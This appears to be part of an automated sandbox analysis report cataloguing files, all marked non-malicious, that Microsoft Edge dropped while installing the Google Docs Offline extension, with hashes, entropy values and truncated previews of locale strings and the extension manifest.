                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11280
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.752941882424501
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
                                                                                                                                                                                                                                                                                                                                MD5:F897300492E3AB467E56883D23D02D77
                                                                                                                                                                                                                                                                                                                                SHA1:DECD6DC9E70ECCF9B45983147680614C019B99EA
                                                                                                                                                                                                                                                                                                                                SHA-256:F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
                                                                                                                                                                                                                                                                                                                                SHA-512:B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.417781191647272
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
                                                                                                                                                                                                                                                                                                                                MD5:35068E2550395A8A3E74558F2F4658DA
                                                                                                                                                                                                                                                                                                                                SHA1:BD6620054059BFB7A27A4FFF86B9966727F2C2B9
                                                                                                                                                                                                                                                                                                                                SHA-256:E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
                                                                                                                                                                                                                                                                                                                                SHA-512:4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3700)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):95606
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.405749379350638
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
                                                                                                                                                                                                                                                                                                                                MD5:9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
                                                                                                                                                                                                                                                                                                                                SHA1:88D7F0A88C5807BFE00F13B612CC0522EEBE514A
                                                                                                                                                                                                                                                                                                                                SHA-256:E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
                                                                                                                                                                                                                                                                                                                                SHA-512:34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
                                                                                                                                                                                                                                                                                                                                Malicious:false
